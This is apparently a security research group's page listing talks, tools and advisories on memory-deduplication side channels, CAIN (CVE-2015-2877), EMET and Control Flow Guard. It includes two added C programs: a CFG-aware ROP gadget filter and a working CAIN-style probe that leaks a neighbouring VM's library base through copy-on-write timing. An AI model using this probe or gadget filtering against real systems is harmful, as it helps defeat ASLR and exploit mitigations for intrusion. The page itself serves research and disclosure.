Talks, White Papers, Tools, Advisories, Security Notes

Talks, White Papers & Tools

Dec 29, 2016

Memory Deduplication: The Curse that Keeps on Giving

Kaveh Razavi, Erik Bosman, Ben Gras and Antonio present three different attack techniques that all (ab)use memory deduplication: a cross-VM data leak attack, a cross-VM data write attack, and an in-sandbox JavaScript attack in MS Edge that leaks data and escalates to full memory read/write. All three rest on the same observation: the deduplicator merges identical physical pages, so whether a page an attacker crafted already exists elsewhere becomes observable from the copy-on-write cost of the next store to it.

Jun 16, 2016

CFG-aware ROP

Matthias contributed a Control Flow Guard (CFG) check to the ROP gadget finder Ropper. It filters out gadgets whose start address is not a valid CFG indirect-call target, so the remaining gadgets are the ones reachable through a CFG-checked indirect call in a hardened binary. You can find the code in the official master branch of the Ropper GitHub repository.
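The check a CFG-aware gadget filter has to perform, shown here as an added example rather than Ropper's own implementation (that lives in the repository linked above): decode the GuardCFFunctionTable that the linker emits in the PE load configuration directory, derive the set of valid indirect-call targets from it, and discard every gadget that does not start at one of them. The table bytes, the image base and the gadget addresses below are constructed for this example; locating the table inside a real PE (through the load config directory's GuardCFFunctionTable, GuardCFFunctionCount and GuardFlags fields) is assumed to have been done already. The flag constants are the winnt.h definitions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* GuardFlags bits of IMAGE_LOAD_CONFIG_DIRECTORY (winnt.h). */
#define IMAGE_GUARD_CF_INSTRUMENTED              0x00000100u
#define IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT    0x00000400u
#define IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_MASK  0xF0000000u
#define IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_SHIFT 28
/* Per-entry flag byte, present when the stride encoded above is non-zero. */
#define IMAGE_GUARD_FLAG_FID_SUPPRESSED          0x01u
#define IMAGE_GUARD_FLAG_EXPORT_SUPPRESSED       0x02u

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* A binary only enforces CFG when it was compiled with it and ships a target table. */
int cfg_enforced(uint32_t guard_flags)
{
    return (guard_flags & IMAGE_GUARD_CF_INSTRUMENTED) && (guard_flags & IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT);
}

/* Decode the function table into absolute addresses. Each entry is a 4-byte RVA followed by
 * (GuardFlags >> 28) extra bytes; the first extra byte carries the per-entry flags. A
 * FID-suppressed entry is never a valid target, and an export-suppressed one only becomes
 * valid after the export is resolved at runtime, so a static filter treats both as invalid. */
size_t cfg_valid_targets(const uint8_t *table, uint32_t count, uint32_t guard_flags,
                         uint64_t image_base, uint64_t *out, size_t out_max)
{
    size_t extra = (guard_flags & IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_MASK) >> IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_SHIFT;
    size_t n = 0;
    for (uint32_t i = 0; i < count && n < out_max; i++) {
        const uint8_t *e = table + (size_t)i * (4 + extra);
        uint8_t flags = extra ? e[4] : 0;
        if (flags & (IMAGE_GUARD_FLAG_FID_SUPPRESSED | IMAGE_GUARD_FLAG_EXPORT_SUPPRESSED))
            continue;
        out[n++] = image_base + rd32le(e);
    }
    return n;
}

/* A gadget survives only if it starts exactly at a listed target: the loader builds the
 * bitmap consulted by the CFG check from this table, so a gadget a few bytes into a
 * function, the usual ROP case, is rejected. */
size_t filter_gadgets(const uint64_t *gadgets, size_t ng, const uint64_t *valid, size_t nv,
                      uint64_t *out, size_t out_max)
{
    size_t kept = 0;
    for (size_t g = 0; g < ng && kept < out_max; g++)
        for (size_t v = 0; v < nv; v++)
            if (gadgets[g] == valid[v]) { out[kept++] = gadgets[g]; break; }
    return kept;
}

/* Constructed sample (not from a real binary): stride 1, three entries, four gadgets. */
static const uint8_t sample_table[] = {
    0x00, 0x10, 0x00, 0x00, 0x00,   /* RVA 0x1000, flags 0        -> valid   */
    0x30, 0x12, 0x00, 0x00, 0x00,   /* RVA 0x1230, flags 0        -> valid   */
    0x00, 0x20, 0x00, 0x00, 0x01,   /* RVA 0x2000, FID_SUPPRESSED -> invalid */
};
static const uint32_t sample_flags = IMAGE_GUARD_CF_INSTRUMENTED | IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT
                                   | (1u << IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_SHIFT);
static const uint64_t sample_base = 0x140000000ULL;
static const uint64_t sample_gadgets[] = { 0x140001000ULL, 0x140001005ULL, 0x140001230ULL, 0x140002000ULL };

/* i-th gadget that passes the check on the sample, 0 past the end. */
uint64_t demo_surviving_at(size_t i)
{
    uint64_t valid[8], kept[8];
    size_t nv = cfg_valid_targets(sample_table, 3, sample_flags, sample_base, valid, 8);
    size_t nk = filter_gadgets(sample_gadgets, 4, valid, nv, kept, 8);
    return i < nk ? kept[i] : 0;
}

int main(void)
{
    for (size_t i = 0; demo_surviving_at(i); i++)
        printf("CFG-valid gadget: 0x%llx\n", (unsigned long long)demo_surviving_at(i));
    return 0;
}
```

Of the four sample gadgets only the two that start at unsuppressed table entries survive; the one five bytes into a function and the FID-suppressed entry are dropped. For a binary where cfg_enforced() is false the filter is simply not applied.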

Jun 10, 2016

ROP Mitigations and Control Flow Guard

Matthias describes the latest ROP mitigations in EMET 5.5 and the Control Flow Guard (CFG) that ships with Visual Studio 2015. He presents their implementation and discusses the implications for an attacker trying to exploit a hardened application.

Nov 11, 2015

Silently Breaking ASLR In The Cloud

Antonio describes Cross-VM Address Space Layout Introspection (CAIN), an attack against page-based, same-content memory deduplication in Virtual Machine Monitors (VMMs).

Advisories & Security Notes

Oct 31, 2016

Security Note: Potential security weaknesses in EMET 5.5 ROP mitigations

We noticed two weaknesses in the implementation of the EMET 5.5 ROP mitigations. These issues might be known limitations, but as we did not find any public discussion of them we decided to issue a security note.


Jul 30, 2015

CVE-2015-2877: Cross-VM ASL INtrospection (CAIN)

We discovered a new attack vector against memory deduplication in Virtual Machine Monitors (VMMs) that lets an attacker leak the randomized base addresses of libraries and executables in processes of neighbouring Virtual Machines (VMs), by crafting candidate pages and observing which of them the deduplicator merges.
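How the CAIN probe described here and in the talk above works, as an added example that is not the advisory's or the paper's code: one candidate page is built per possible load address of a library, the deduplicator is given time to merge the single candidate that matches the victim VM's real page, and a timed store then exposes the merged page through its copy-on-write fault. The page template (pointer slots and deltas), the candidate range and the timings used by demo_pick are constructed for this example; on Linux the madvise(MADV_MERGEABLE) hint lets KSM stand in for the VMM's deduplicator in a same-host test.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/mman.h>

#define PAGE_SZ 4096
#define NSLOT   4

/* Constructed template (an assumption for this example, not from the advisory): the victim
 * page holds four absolute pointers at these offsets, each equal to the module base plus a
 * fixed delta, and constant bytes elsewhere. A real attack copies the template from its own
 * copy of the library and patches only the relocated fields. */
static const size_t   slot_off[NSLOT]   = { 0x10, 0x48, 0x100, 0x7f8 };
static const uint64_t slot_delta[NSLOT] = { 0x1000, 0x2350, 0x5b0, 0x10f8 };

/* Fill one page with the content the victim's page would have at load address `base`. */
void build_candidate(uint8_t *page, uint64_t base)
{
    memset(page, 0xAB, PAGE_SZ);
    for (size_t i = 0; i < NSLOT; i++) {
        uint64_t v = base + slot_delta[i];
        memcpy(page + slot_off[i], &v, sizeof v);
    }
}

static uint64_t now_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}

/* Time one store. A page the deduplicator merged is mapped read-only and shared, so the
 * store takes a copy-on-write fault and is far slower than a store to a private page. */
uint64_t time_write(volatile uint8_t *page)
{
    uint64_t t0 = now_ns();
    page[0] ^= 1;
    return now_ns() - t0;
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Index of the candidate whose store took at least `factor` times the median, or -1. */
int pick_merged(const uint64_t *t, size_t n, unsigned factor)
{
    if (n == 0) return -1;
    uint64_t *s = malloc(n * sizeof *s);
    if (s == NULL) return -1;
    memcpy(s, t, n * sizeof *s);
    qsort(s, n, sizeof *s, cmp_u64);
    uint64_t median = s[n / 2] ? s[n / 2] : 1;   /* guard against a zero-resolution clock */
    free(s);
    int best = -1;
    uint64_t best_t = 0;
    for (size_t i = 0; i < n; i++)
        if (t[i] > best_t) { best_t = t[i]; best = (int)i; }
    return best_t >= (uint64_t)factor * median ? best : -1;
}

/* One candidate page per base in [base_lo, base_lo + n*stride), a wait for the deduplicator's
 * scan, then one timed store per page. Returns the leaked base, or 0 if nothing was merged. */
uint64_t cain_probe(uint64_t base_lo, uint64_t stride, size_t n, unsigned wait_s)
{
    size_t len = n * PAGE_SZ;
    uint8_t *pages = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (pages == MAP_FAILED) return 0;
#ifdef MADV_MERGEABLE
    madvise(pages, len, MADV_MERGEABLE);   /* KSM opt-in for a same-host demo; a VMM scans guest memory unasked */
#endif
    for (size_t i = 0; i < n; i++)
        build_candidate(pages + i * PAGE_SZ, base_lo + i * stride);
    sleep(wait_s);                          /* must exceed the deduplicator's scan period */
    uint64_t t[n];
    for (size_t i = 0; i < n; i++)
        t[i] = time_write(pages + i * PAGE_SZ);
    int hit = pick_merged(t, n, 20);
    munmap(pages, len);
    return hit < 0 ? 0 : base_lo + (uint64_t)hit * stride;
}

/* Deterministic helpers so the pieces can be checked without a deduplicating host. */
uint64_t candidate_ptr_at(uint64_t base, size_t slot)
{
    static uint8_t page[PAGE_SZ];
    uint64_t v;
    build_candidate(page, base);
    memcpy(&v, page + slot_off[slot], sizeof v);
    return v;
}

int demo_pick(int with_outlier)   /* constructed store timings in ns */
{
    const uint64_t outlier[5] = { 100, 110, 95, 4000, 105 };
    const uint64_t flat[4]    = { 100, 110, 95, 120 };
    return with_outlier ? pick_merged(outlier, 5, 20) : pick_merged(flat, 4, 20);
}

int main(void)
{
    /* Constructed range: 256 candidate bases at 64 KiB spacing, five-minute wait. */
    uint64_t base = cain_probe(0x7ff800000000ULL, 0x10000, 256, 300);
    if (base) printf("merged candidate: base 0x%llx\n", (unsigned long long)base);
    else      printf("no merged page observed\n");
    return 0;
}
```

On a host without deduplication the probe reports no merged page. Where deduplication is active the wait has to cover a full pass of the scanner (minutes at default settings), and in practice the store timings are repeated and averaged to suppress cache and TLB noise, which this example leaves out; the 20x outlier threshold in pick_merged is a constructed value, not one from the advisory.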
